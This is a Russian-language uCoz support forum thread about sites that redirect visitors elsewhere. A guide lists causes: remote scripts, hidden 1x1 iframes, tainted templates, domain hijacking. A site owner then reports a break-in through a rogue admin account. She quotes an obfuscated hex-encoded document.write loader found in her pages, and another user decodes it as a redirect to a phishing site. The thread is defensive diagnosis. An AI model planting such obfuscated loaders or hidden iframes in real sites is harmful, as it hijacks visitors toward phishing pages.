Модератор форума: Yuri_G |
Сообщество uCoz Мастерская uCoz Безопасность сайта При заходе на сайт перекидывает на другой |
При заходе на сайт перекидывает на другой |
Описание проблемы: При попытке зайти на свой сайт вас прекидывает на совершенно чужой сайт. Это может происходить сразу, через какой-то промежуток времени или вместо вашей страницы вы видите чужую с чужим адресом Причины возникновения: 1) Сторонние скрипты вставленные на сайт с подгрузкой с чужих адресов. И iframe вставки Если вы ставите к себе на сайт скрипт подобного вида Code <script type="text/javascript" src="http://levyisite.ru/nazvanie.js"></script> где levyisite.ru адрес не вашего сайта, а чужого, то вы всегда должны быть готовы к тому, что содержимое подгружаемого скрипта может изменится. Если скрипт работает в нормальном режиме сначала, то при изменении или удалении содержимого на сервере где он храниться, скрипт или перестанет работать или будет иметь уже другие функции, иногда вредоносные Если вы решили установить к себе на сайт скрипт, но ничего в скриптах не понимаете, перед установкой вы можете обратиться в эту тему //forum.ucoz.ru/forum/45-35735-1 и проверить его на безопасность 2) Сторонние скрипты вшитые в элементы дизайна или шаблонов найденные в открытом доступе Если вы все время находитесь в состоянии поиска новых украшений для своего сайта, таких как готовых блоков, информеров, измененных дизайнов мини-чатов, опросов, форм входа, вида материалов, блоков статистики на форум или сайт и так далее, то при копировании готового кода на сайтах, где это все раздают, проверяйте код на наличие сторонних скриптов (тип скрипта описан в пункте1) и iframe вставок. Если вы видите в коде конструкцию наподобии этой Code <iframe src="http://levyisite.ru" width="1" height="1"></iframe> Где levyisite.ru - это адрес чужого сайта а Code width="1" height="1" Code width="0" height="0" Если вы вообще не разбираетесь в HTML и не понимаете что копируете, то перед установкой очередного украшения на сайт вы можете проверить полученный код для вставки в этой теме //forum.ucoz.ru/forum/45-35735-1 на наличие вредоносных объектов 3) Рипы шаблонов и готовые шаблоны найденные в открытом доступе. В готовых шаблонах могут быть вшиты скрипты и iframe вставки, а так же рекламные блоки и спам скрытый посредством кода от вывода на экран. Вшитые скрипты и вставки могут быть с пустым содержимым и при запуске шаблона они могут не проявлять никаких признаков. Но подгруженные с чужих сайтов, содержимое может быть изменено, после чего может начаться вредоносная активность 4) Перехват домена. На сайтах с прикрепленным доменом, особенно у тех кто не имеет доступа к управлению доменом, сторонними лицами могут быть изменены настройки домена. Эффект может заключаться в том, что при переходе на свой сайт вы можете увидеть там совсем другой или будет происходить редирект на другой адрес Если вы вообще ничего не поняли, но проблема переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает, а так же указать происходит это под логином или под гостем |
Скрипт попал на сайт усилиями того, что имеет доступ к файловому менеджеру через админ бар на сайте и доступ к редактированию содержимого страниц. то есть любой пользователь из группы администратор. у вас три администратора, два из которых действующие. и конечно это все можно проделать через панель управления
|
Пока написала, нашла
С 4 числа был вышит редирект при переходе с ПС на страницу _amsacquisitions.com/wp-content/themes/SBERBANK-ONLINE.RU/. 3го числа был добавлен в список админов этот левый чел http://uid.me/mr.rekoj_mr.rekoj1 Нашла в первом контейнере <script src="//goo.gl/6g1MUX"></script> такое. Остался вопрос, как в админах появился новый чел( пароли у меня сложные, ну буду менять сейчас. Если бы человек получил доступ в админку, он бы сделал все от админа и не стал бы назначать права своему аккаунту и с него воротить дела. Шаблон у меня купленный на utemplates. На сайте только проверенная годами реклама - гугл, ледикеш. Прям очень печально, что так ничего непонятно, подарила трафика за выходные пока была в отьезде очень щедро... Еще в "страницы сайта" был найден такой: Код Код<script>var _0xb4b0=["\x3C","\x73","\x63\x72","\x69\x70","\x74\x20\x74\x79","\x70\x65\x3D\x22\x74","\x65\x78\x74","\x2F","\x6A\x61","\x76\x61","\x73\x63","\x72\x69","\x70\x74\x22\x20\x73\x72","\x63\x3D\x22\x68","\x74\x74","\x70\x3A\x2F","\x2F\x67","\x6F","\x6F\x2E\x67","\x6C\x2F\x36\x67\x31\x4D\x55\x58\x22\x3E","\x3C\x2F","\x69","\x70","\x74","\x3E","\x77\x72\x69\x74\x65"];document[_0xb4b0[25]](_0xb4b0[0]+ _0xb4b0[1]+ _0xb4b0[2]+ _0xb4b0[3]+ _0xb4b0[4]+ _0xb4b0[5]+ _0xb4b0[6]+ _0xb4b0[7]+ _0xb4b0[8]+ _0xb4b0[9]+ _0xb4b0[10]+ _0xb4b0[11]+ _0xb4b0[12]+ _0xb4b0[13]+ _0xb4b0[14]+ _0xb4b0[15]+ _0xb4b0[16]+ _0xb4b0[17]+ _0xb4b0[18]+ _0xb4b0[19]+ _0xb4b0[20]+ _0xb4b0[1]+ _0xb4b0[2]+ _0xb4b0[21]+ _0xb4b0[22]+ _0xb4b0[23]+ _0xb4b0[24])</script> Сообщение отредактировал Oksana5339 - Понедельник, 06 Фев 2017, 06:35:26
|
Если перевести на человеческий: Код <script type="text/javascript" src="http://goo.gl/6g1MUX"></script> Сам скрипт вызывает перенаправление трафика на фишинговый сайт. |
Ну да, тот же, что в открытйю так же был прописан. Сейчас захожу с поисковика - опять. Пароли меняла, все удаляла, пароль админа не подошел, хотя я его записала и точно входила. Значит шаблон utemlate с уязвимостью продали или что?
Теперь я не могу пароль сменить, т.к. не знаю, на какой мне его поменяли... На аккаунте много сайтов, ломают только 1 Сообщение отредактировал Oksana5339 - Понедельник, 06 Фев 2017, 19:17:10
|
Oksana5339, укажите адрес сайта
|
webanet, muzh-zh*ena.ru
Только что удалила из 2 мест снова, на этот раз поставили хитрее. В страницы сайта - после многих переносов строк, в первый контейнер в середину. И сохранить дамп БД я не могу, видимо этот человек сделал уже (1 раз в 7 дней же) Сообщение отредактировал Oksana5339 - Понедельник, 06 Фев 2017, 19:32:29
|
Oksana5339, не удаляйте то что вы удаляете. нужно осмотреть что к чему. попробуйте перейти снова из поисковика
как только появится снова напишите сразу сюда или в тех.поддержку и ничего не трогайте |
Oksana5339, вы какой пароль меняли? пароль uid профиля или пароль администратора? пробовали старый пароль ввести при входе в пу?
|
webanet, меняла только пароль сайта, хотела уид, но реально не нашла, где и писала в поддержку.
Думала раньше, что не сильно тупая, но что-то не поняла. Старый пароль пробовала ввести, не помогло. И я точно с новым после смены входила. По логам 03.02.2017, 20:22 /index; editing site page mrrekoj (Администраторы) 94.46.163.230 Page ID: 1. Сегодня в логах никакие действия не прописаны. Орудовали с админки очевидно Добавлено (06 Фев 2017, 19:55:01) Сообщение отредактировал Oksana5339 - Понедельник, 06 Фев 2017, 19:52:46
|
Oksana5339, а где вы меняете пароль от админки?
|
Oksana5339, если появится снова ничего не трогайте и напишите сразу. особенно опишите подробно что вы делали до того как появился вредоносный код снова
|
| |||